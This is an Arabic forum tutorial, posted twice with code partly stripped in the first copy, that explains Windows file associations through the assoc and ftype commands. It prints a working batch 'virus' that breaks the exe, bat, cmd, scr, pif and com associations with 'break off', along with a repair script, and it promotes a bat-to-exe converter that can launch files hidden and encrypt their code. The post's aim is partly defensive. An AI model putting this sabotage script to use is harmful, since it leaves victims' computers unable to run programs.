hisooka
زيزوومى متألق
غير متصل
شرح مشكل عدم عمل الملفات التنفيذية والدفعية وملفات اخرى على الجهاز مع امثلة وحلول + هدية
:getsmile.tmp0020608
في الاونة الاخيرة لاحظت ان كثيرا من الاعضاء يعانون من مشكل عدم عمل الملفات التنفيدية او ملفات
اخرى وبالتالي يسود الشك عن مصدر هذا المشكل الا ان لديه حلولا تمكن من تجاوزه
ولهذا طرحت هذا الموضوع لاوضح المشكل وطريقة حله بشكل مبسط وامل ان يعجبكم الموضوع
:kmj-by0000:
ارجو منكم ان تحملوا اولا هذا الملف قبل اي تجربة
بعد تحميله اضغطوا عليه بالزر الايمن للفارة ثم على Install وهكذا سترجع الامور كما كانت
سنبدأ الان بدراسة بعض اوامر من الدوس مهمة وعادة ما تستعمل في برمجة ملفات دفعية ضارة
وساعطيكم ايضا حلولا او مضادات عبارة عن ملفات دفعية لاصلاح الضرر الذي تلحقه
النظام يحتوي على لواحق عديدة وكثيرة لكل برنامج لاحقته الخاصة فمثلا هذا الملف Hisooka.txt
لاحقته هي : txt والذي يعني انه يفتح بالبرنامج Notepad.exe
وهذا الملف eset.rar يعني ان winrar.exe هو البرنامج الذي يفتح هذا النوع من الملفات
والسؤال الان هو كيف نعرف البرنامج الذي يشغل الاحقة التي نبحث عنها ؟
اذهبوا الان الى start > run > cmd
واكتبوا في الدوس هذا الامر : assoc واضعطوا على enter
ماذا ترون ؟
انا ساجيبكم عن هذا السؤال انتم ترون جميع اللواحق الموجودة على نظامكم وكل واحد ستختلف عنده عدد وانواع اللواحق على حسب البرامج التي قام بتنصيبها على جهازه
واذا اردنا ان نعرف البرنامج الذي يفتح لاحقة معينة مثلا txt والكل يعرف هذه الصيغة فماذا سنفعل ؟
سنكتب في الدوس هذا الامر : Assoc.txt ثم نضغط على Enter
اي ان البرنامج المسؤول عن عمل الملف ذو اللاحقة هو : txtfile
والان نريد ان نعرف مسار تواجد هذا البرنامج txtfile
:i::i: انتبهوا جيدا هذه المرحلة مهمة لموضوعنا هذا :i::i:
اكتبوا في الدوس الامر : Ftype txtfile ثم enter
كما تلاحظون هذا هو مسار البرنامج وهو في الحقيقة برنامج Notepad.exe
وعلاقة بموضوعنا اليوم فقد وصلنا الان الى المرحلة المناسبة لفهم اليات عمل الفيروس
كما قلنا الامر Ftype يقوم باعطائنا مسار البرنامج الذي يشغل اللاحقة التي نبحث عنها
اذن ماذا لو غيرنا هذا المسار او بطريقة اخرى ماذا لو قمنا بتعطيل البرنامج المسؤول عن تشغيل اللاحقة ؟
هكذا لن تعمل الملفات بشكل جيد اذن لنقم بتجربة صغيرة :
اولا ادخلوا الى الدوس وقوموا بكتابة الامرالتالي assoc.exe وسيعطينا exefile
هذا الامر لمعرفة البرنامج المسؤول عن تشغيل الملفات التنفيذية ولايوجد برنامج محدد مسؤول عن عمله وانما النظام هو المسؤول
وستكون النتيجة هكذا assoc.exe=exefile الان سنبحث عن المسار انتم تعرفون الطريقة اليس كذلك ؟
اكتبوا الامر التالي : ftype exefile والنتيجة ستكون هكذا :
وهنا الفكرة هي تغيير هذا المسار وبالتالي لن تشتغل كل الملفات التنفيدية الموجودة في النظام ولو كانت محمولة وهناك من سيقول الدهاب للريجستري سيحل المشكلة او اخد نسخة احتياطية للريجستري اقول لهم هذا لن ينفع بتاتا :no::no::no::no:
لان الدخول الى الريجستري يتم عن طريق كتابة الامر Regedit عن طريق Run
Regedit.exe هو ايضا ملف تنفيذي ولن يعمل
لتغيير مسار البرنامج نقوم بالامر التالي :
يمكنكم كتابة اي شيء في مكان %* ليس بالضرورة كتابة المسار هكذا المهم ان يكون خاطئا يمكنك مثلا كتابة :
كما رايتم لقد عدلت المسار وابتداء من اللحظة لن تعمل الملفات التنفيدية :hh::hh::hh::hh:
ولكن كيف سنقوم الان بارجاع عمل الملفات التنفيذية ؟ :i::i:
بطبيعة الحال الامر سهل سنقوم بارجاع :q::q:
المسار لما كان عليه من قبل ولكي نقوم بذلك نكتب الامر التالي :
وهكذا ستعمل الملفات التنفيذية من جديد ولكنكم نسيتم شيئا مهما , اين ستقومون بكتابة الامر ؟ :u:
طبعا الجواب هو : في الدوس cmd.exe ولكنه ملف تنفيذي ايضا ولن يعمل هههههههههه :hh::hh:
اذن اين ؟ :y:
الحل المتبقي لنا الان هو الملف الدفعي الذي لاحقته هي bat وبما ان هذه اللاحقة لم يتغير مسارها
بعد فان الملف الدفعي سيعمل اذن سنفتح bloc note جديد ونكتب فيه هذه الاوامر :
انتم تعرفون لماذا كتبت
عوضا عن
لاننا الان نكتب ملف دفعي ولا نكتب مباشرة في نافذة الدوس لابد من اضافة علامة اخرى كهذه % في الملف الدفعي
اذن نحن الان كتبنا الاوامر وسنحفظ الملف باللاحقة bat عن طريق file > save as
بعد استخدامنا للملف الدفعي سترجع الملفات الدفعية الى ماكانت عليه ؟ لا لا لا لا لالا لا لا :hh::hh::hh:
لان bloc note ملف تنفيدي ايضا (Notepad.exe ) :y::y:
اذن الحل الوحيد هو ان تحتفظ بهذا الملف الدفعي قبل ان يصيبك الفيروس
ولكن نسيتم شيئا مهم ماهو يا ترى ؟
الامر المهم هو ماذا لم تم تغيير مسار تشغيل الملفات الدفعية
يمكننا تغيير المسار كما فعلنا مع الملفات التنفيذية
ويمكن ايضا اللجوء الى الملفات الدفعية عن طريق اللاحقة cmd ولكن سيقع لنا نفس الشيء
الذي وقع مع اللاحقة bat ( لن نستطيع كتابته لا في النوتباد ولا في نافذة الدوس :er
اذن سنقع في ورطة كبيرة جدا لان الفيروس الان سيصبح هكذا :
:getsmile.tmp0020608
او هكذا:
@
break off هو امر لكي لا يتم ايقاف الملف الدفعي من قبل المستخدم
الان جميع اللواحق المهمة في النظام ستعطل بهذا الفيروس :cr:
الحل الوحيد الموجود حاليا هو ملف واحد وهو ملف ذو اللاحقة INF مثل الاوتوران
ولكن هذا الملف عبارة عن Bloc note وبالتالي لن ينفعنا اذن هذا الفيروس ليس له حل هههههه :hh:
انا امزح هذا الملف فعلا يرجع الملفات التنفيدية والدفعية تعمل وكذلك com pif scr
هذا رابط الملف
بعد تحميله اضغطوا عليه بالزر الايمن للفارة ثم على Install وهكذا سترجع الامور كما كانت في السابق
يمكنكم الان تطبيق التجربة ولكن كما قلت لكم لا بد ان تحملو الملف قبل تطبيق التجربة
وعند تطبيقها سترون ان البرامج لن تعمل ولتعمل من جديد قوموا ب Install للملف
اما بالنسبة للواحق الاخرى فليست مشكلة يمكنكم ارجاعها بانفسكم وذلك سهل والجميع يعرف الطريقة
open with > choose program واذا لم يكن في القائمة يمكن عندها الضغظ على الزر Browse ثم اختيار البرنامج من مساره في Program files
بالنسبة لتغيير مسارات اللواحق بالنسبة للملفات الاخرى كـ : wmv pdf mp3 هذا لن ينفع لان البرامج
لان ارجاعها للعمل سهل عبر open with . تعطيل مسارات هذه الملفات (exe bat pif scr com) هو الذي سيؤذي النظام لان mp3 مثلا تابع للبرنامج windows media player وهذا البرنامج ملف تنفيذي وبالتالي تعطيل الملفات التنفيذية كتعطيل اللاواحق الاخرى .
الهــــديــــــة :
وفي الاخير هذه هدية مني لكم يا اخواني الاعزاء وهي عبارة عن برنامج اسمه E-BatchMaker
مبرمج بلغة دلفي من برمجة الاخ musvc ووظيفته تحرير ملفات الدوس بسهولة عوضا عن تحريرها في النوت باد ويمكن ايضا من تحويل الملفات الدفعية الى ملفات تنفيذية اضافة الى خيار ضغطها ب UPX ليكون حجمها صغيرا جدا وما احبه كثيرا في هذه الاداة هو سهولة كتابة السكريبت مثلا نريد
كتابة الامر : ftype سنكتفي فقط بكتابة الحرف الاول وهو f ثم نضغط على Ctrl + Space في الكيبورد وستخرج لائحة ثم نجد فيها جميع اوامر الدوس التي تبدأ بالحرف F كما في الصورة
في الحقيقة عالم الدوس كبير جدا ومازالت فيه عدة اوامر خطيرة فيمكن برمجة ملف دفعي مثلا على ان يعمل في وقت محدد قد يكون بعد شهر او ان ستدعي برامج اخرى للعمل في فترة محددة من مبرمجه
وللاسف فالملفات الدفعية لا تثير شكوك برامج الحماية لان لها سلوك المستعمل وهذا لايعني كل الملفات الدفعية فهناك بعضها يمكن للمضادات امساكها
اعتذر ان اطلت عليكم واكثرت من الكلام اتمنى انكم قد استفدتم فالوقاية خير من العلاج لا تشغلوا اي
ملف دفعي حتي ترو ما بداخله من اوامر وتاكدوا من خلوها من هذه الاوامر الضارة
وفي الاخير انا بريئ من كل من يستخدم هذه المعلومات ليضر بها عباد الله
اتمنى ان تدعوا لي ولوالدي ولاخواني بالنجاح في الدنيا والاخرة
:getsmile.tmp0020608
في الاونة الاخيرة لاحظت ان كثيرا من الاعضاء يعانون من مشكل عدم عمل الملفات التنفيدية او ملفات
اخرى وبالتالي يسود الشك عن مصدر هذا المشكل الا ان لديه حلولا تمكن من تجاوزه
ولهذا طرحت هذا الموضوع لاوضح المشكل وطريقة حله بشكل مبسط وامل ان يعجبكم الموضوع
:kmj-by0000:
ارجو منكم ان تحملوا اولا هذا الملف قبل اي تجربة
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
بعد تحميله اضغطوا عليه بالزر الايمن للفارة ثم على Install وهكذا سترجع الامور كما كانت
سنبدأ الان بدراسة بعض اوامر من الدوس مهمة وعادة ما تستعمل في برمجة ملفات دفعية ضارة
وساعطيكم ايضا حلولا او مضادات عبارة عن ملفات دفعية لاصلاح الضرر الذي تلحقه
النظام يحتوي على لواحق عديدة وكثيرة لكل برنامج لاحقته الخاصة فمثلا هذا الملف Hisooka.txt
لاحقته هي : txt والذي يعني انه يفتح بالبرنامج Notepad.exe
وهذا الملف eset.rar يعني ان winrar.exe هو البرنامج الذي يفتح هذا النوع من الملفات
والسؤال الان هو كيف نعرف البرنامج الذي يشغل الاحقة التي نبحث عنها ؟
اذهبوا الان الى start > run > cmd
واكتبوا في الدوس هذا الامر : assoc واضعطوا على enter
ماذا ترون ؟
انا ساجيبكم عن هذا السؤال انتم ترون جميع اللواحق الموجودة على نظامكم وكل واحد ستختلف عنده عدد وانواع اللواحق على حسب البرامج التي قام بتنصيبها على جهازه
واذا اردنا ان نعرف البرنامج الذي يفتح لاحقة معينة مثلا txt والكل يعرف هذه الصيغة فماذا سنفعل ؟
سنكتب في الدوس هذا الامر : Assoc.txt ثم نضغط على Enter
اي ان البرنامج المسؤول عن عمل الملف ذو اللاحقة هو : txtfile
والان نريد ان نعرف مسار تواجد هذا البرنامج txtfile
:i::i: انتبهوا جيدا هذه المرحلة مهمة لموضوعنا هذا :i::i:
اكتبوا في الدوس الامر : Ftype txtfile ثم enter
كما تلاحظون هذا هو مسار البرنامج وهو في الحقيقة برنامج Notepad.exe
وعلاقة بموضوعنا اليوم فقد وصلنا الان الى المرحلة المناسبة لفهم اليات عمل الفيروس
كما قلنا الامر Ftype يقوم باعطائنا مسار البرنامج الذي يشغل اللاحقة التي نبحث عنها
اذن ماذا لو غيرنا هذا المسار او بطريقة اخرى ماذا لو قمنا بتعطيل البرنامج المسؤول عن تشغيل اللاحقة ؟
هكذا لن تعمل الملفات بشكل جيد اذن لنقم بتجربة صغيرة :
اولا ادخلوا الى الدوس وقوموا بكتابة الامرالتالي assoc.exe وسيعطينا exefile
هذا الامر لمعرفة البرنامج المسؤول عن تشغيل الملفات التنفيذية ولايوجد برنامج محدد مسؤول عن عمله وانما النظام هو المسؤول
وستكون النتيجة هكذا assoc.exe=exefile الان سنبحث عن المسار انتم تعرفون الطريقة اليس كذلك ؟
اكتبوا الامر التالي : ftype exefile والنتيجة ستكون هكذا :
PHP:
exefile="%1" %*لان الدخول الى الريجستري يتم عن طريق كتابة الامر Regedit عن طريق Run
Regedit.exe هو ايضا ملف تنفيذي ولن يعمل
لتغيير مسار البرنامج نقوم بالامر التالي :
PHP:
ftype exefile=%*
PHP:
ftype exefile=hisookaولكن كيف سنقوم الان بارجاع عمل الملفات التنفيذية ؟ :i::i:
بطبيعة الحال الامر سهل سنقوم بارجاع :q::q:
المسار لما كان عليه من قبل ولكي نقوم بذلك نكتب الامر التالي :
PHP:
ftype exefile="%1" %*طبعا الجواب هو : في الدوس cmd.exe ولكنه ملف تنفيذي ايضا ولن يعمل هههههههههه :hh::hh:
اذن اين ؟ :y:
الحل المتبقي لنا الان هو الملف الدفعي الذي لاحقته هي bat وبما ان هذه اللاحقة لم يتغير مسارها
بعد فان الملف الدفعي سيعمل اذن سنفتح bloc note جديد ونكتب فيه هذه الاوامر :
PHP:
@echo off
ftype exefile="%%1" %%*
exit
PHP:
"%%1" %%*
PHP:
"%1" %*اذن نحن الان كتبنا الاوامر وسنحفظ الملف باللاحقة bat عن طريق file > save as
بعد استخدامنا للملف الدفعي سترجع الملفات الدفعية الى ماكانت عليه ؟ لا لا لا لا لالا لا لا :hh::hh::hh:
لان bloc note ملف تنفيدي ايضا (Notepad.exe ) :y::y:
اذن الحل الوحيد هو ان تحتفظ بهذا الملف الدفعي قبل ان يصيبك الفيروس
ولكن نسيتم شيئا مهم ماهو يا ترى ؟
الامر المهم هو ماذا لم تم تغيير مسار تشغيل الملفات الدفعية
PHP:
assoc.bat=batfile
ftype batfile="%1" %*ويمكن ايضا اللجوء الى الملفات الدفعية عن طريق اللاحقة cmd ولكن سيقع لنا نفس الشيء
الذي وقع مع اللاحقة bat ( لن نستطيع كتابته لا في النوتباد ولا في نافذة الدوس :er
اذن سنقع في ورطة كبيرة جدا لان الفيروس الان سيصبح هكذا :
:getsmile.tmp0020608
PHP:
@echo off
break off
ftype exefile=%%*
ftype batfile=%%*
ftype cmdfile=%%*
ftype scrfile=%%*
ftype piffile=%%*
ftype comfile=%%*
exit@
PHP:
echo off
break off
ftype exefile=hisooka
ftype batfile=eset
ftype scrfile=morocco
ftype cmdfile=tarfraout
ftype piffile=delphi
ftype comfile=kaspersky
exitالان جميع اللواحق المهمة في النظام ستعطل بهذا الفيروس
:cr:الحل الوحيد الموجود حاليا هو ملف واحد وهو ملف ذو اللاحقة INF مثل الاوتوران
ولكن هذا الملف عبارة عن Bloc note وبالتالي لن ينفعنا اذن هذا الفيروس ليس له حل هههههه :hh:
انا امزح هذا الملف فعلا يرجع الملفات التنفيدية والدفعية تعمل وكذلك com pif scr
هذا رابط الملف
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
بعد تحميله اضغطوا عليه بالزر الايمن للفارة ثم على Install وهكذا سترجع الامور كما كانت في السابق
يمكنكم الان تطبيق التجربة ولكن كما قلت لكم لا بد ان تحملو الملف قبل تطبيق التجربة
وعند تطبيقها سترون ان البرامج لن تعمل ولتعمل من جديد قوموا ب Install للملف
اما بالنسبة للواحق الاخرى فليست مشكلة يمكنكم ارجاعها بانفسكم وذلك سهل والجميع يعرف الطريقة
open with > choose program واذا لم يكن في القائمة يمكن عندها الضغظ على الزر Browse ثم اختيار البرنامج من مساره في Program files
بالنسبة لتغيير مسارات اللواحق بالنسبة للملفات الاخرى كـ : wmv pdf mp3 هذا لن ينفع لان البرامج
لان ارجاعها للعمل سهل عبر open with . تعطيل مسارات هذه الملفات (exe bat pif scr com) هو الذي سيؤذي النظام لان mp3 مثلا تابع للبرنامج windows media player وهذا البرنامج ملف تنفيذي وبالتالي تعطيل الملفات التنفيذية كتعطيل اللاواحق الاخرى .
الهــــديــــــة :
وفي الاخير هذه هدية مني لكم يا اخواني الاعزاء وهي عبارة عن برنامج اسمه E-BatchMaker
مبرمج بلغة دلفي من برمجة الاخ musvc ووظيفته تحرير ملفات الدوس بسهولة عوضا عن تحريرها في النوت باد ويمكن ايضا من تحويل الملفات الدفعية الى ملفات تنفيذية اضافة الى خيار ضغطها ب UPX ليكون حجمها صغيرا جدا وما احبه كثيرا في هذه الاداة هو سهولة كتابة السكريبت مثلا نريد
كتابة الامر : ftype سنكتفي فقط بكتابة الحرف الاول وهو f ثم نضغط على Ctrl + Space في الكيبورد وستخرج لائحة ثم نجد فيها جميع اوامر الدوس التي تبدأ بالحرف F كما في الصورة
PHP:
What is special in this program :
1 : It's fast.
2 : Converting bat files to exe.
3 : Put an icon on exe file.
4 : Including files to extract them.
5 : Extract the file on the windows disk.
6 : Start the bat file normal or hidden.
7 : Convert normal path to short path.
8 : Add "Open with" on bat and cmd files.
9 : Have many batch codes.
1o: Color mixer.
11: Chose your compress options.
12: Encrypt code !
13: Convert image to ASCII art !
14: Converting Word to ASCII art !
15: Batch Editor with codes list(Ctrl+Space) !
16: Supporting plugins.
يجب عليك
تسجيل الدخول
او
تسجيل لمشاهدة الرابط المخفي
في الحقيقة عالم الدوس كبير جدا ومازالت فيه عدة اوامر خطيرة فيمكن برمجة ملف دفعي مثلا على ان يعمل في وقت محدد قد يكون بعد شهر او ان ستدعي برامج اخرى للعمل في فترة محددة من مبرمجه
وللاسف فالملفات الدفعية لا تثير شكوك برامج الحماية لان لها سلوك المستعمل وهذا لايعني كل الملفات الدفعية فهناك بعضها يمكن للمضادات امساكها
اعتذر ان اطلت عليكم واكثرت من الكلام اتمنى انكم قد استفدتم فالوقاية خير من العلاج لا تشغلوا اي
ملف دفعي حتي ترو ما بداخله من اوامر وتاكدوا من خلوها من هذه الاوامر الضارة
وفي الاخير انا بريئ من كل من يستخدم هذه المعلومات ليضر بها عباد الله
اتمنى ان تدعوا لي ولوالدي ولاخواني بالنجاح في الدنيا والاخرة
